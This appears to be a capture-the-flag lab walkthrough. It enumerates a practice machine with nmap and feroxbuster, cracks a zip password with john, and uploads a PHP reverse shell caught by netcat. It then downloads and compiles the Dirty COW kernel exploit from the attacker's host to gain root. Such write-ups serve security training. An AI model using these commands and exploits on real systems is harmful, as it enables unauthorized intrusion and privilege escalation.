RATING
Easy
ENUMERATION
We kick things off with our usual nmap scan here:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.201.219
Since our nmap scan shows the existence of a robots.txt file, we navigate over to this in our browser and spot the directory /textpattern/textpattern and a hint:
Navigating to this directory, we see a login page:
Since we do not have any login credentials, we move forward with our hint. We directory bruteforce with feroxbuster looking specifically for files with the .zip file extension and find spammer.zip:
Command: feroxbuster -u http://192.168.201.219/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -d 1 --quiet -s 200 -x zip
Because this zip file appears to be password protected, we use zip2john and john to bruteforce the passphrase:
Command: zip2john spammer.zip > spammer.hash
Command: john --wordlist=rockyou.txt spammer.hash
After unzipping and extracting its contents, we see the file creds.txt that reveals a username and password:
Command: unzip -e spammer.zip
Command: cat creds.txt
EXPLOITATION
With these credentials, we are able to log into http://192.168.201.219/textpattern/textpattern/:
Navigating to the content section, we see we are able to upload files. Immediately, our minds should go to php reverse shell:
After making the IP address and port edits to our shell, we upload it and execute by navigating over to http://192.168.201.219/textpattern/files/php-shell.php and catch it with our netcat listener:
Command: nc -nvlp 1234
We can see that python is installed, so we can use this to upgrade our shell:
Command: python -c 'import pty; pty.spawn("/bin/bash")'
When checking what kernel we are running, we can see it is 3.2.0, which upon doing a bit of research, we find is vulnerable to the dirty cow exploit:
Using searchsploit, we look up dirty cow exploits and decide on 40839.c:
Command: searchsploit dirty cow
Command: searchsploit -m 40839.c
PRIVILEGE ESCALATION
We transfer our exploit code over to the target and compile it:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.194/40839.c (on target)
Command: gcc -pthread 40839.c -o dirtycow -lcrypt
We execute our exploit, which adds user firefart with a password of our choosing (testpassword in our case):
Now it’s only a matter of switching to our new user with root privileges and read our proof.txt:
